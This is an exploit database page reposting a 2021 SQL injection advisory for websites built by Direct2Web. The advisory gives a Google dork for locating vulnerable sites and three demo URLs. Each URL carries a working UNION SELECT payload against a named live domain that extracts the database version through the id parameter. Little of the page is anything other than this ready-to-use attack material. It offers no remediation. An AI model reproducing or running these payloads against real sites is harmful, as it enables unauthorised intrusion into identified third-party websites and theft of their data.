Advertisement






Developed by Direct2Web Sql Injection Vulnerability

CVE Category Price Severity
Not available CWE-89 Not specified High
Author Risk Exploitation Type Date
Direct2Web Critical Remote 2021-08-19
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021080075

Below is a copy:

Developed by Direct2Web Sql Injection Vulnerability
*********************************************************
#Exploit Title: Developed by Direct2Web Sql Injection Vulnerability
#Date: 2021-08-19
#Exploit Author: Behrouz Mansoori
#Google Dork: "Developed by Direct2Web"
#Category:webapps
#Tested On: windows 10, Firefox
 
 
Proof of Concept:
Search google Dork: "Developed by Direct2Web"


### Demo :

https://www.medicaiditpark.com/product_detail.php?id=-666%27%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+

view-source:http://www.nobleshoeco.com/shop.php?id=-1%27%20union%20select%201111,version(),3333,44444--+

http://ns2.direct2web.in/product_detail.php?id=-575%27%20union%20select%201,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.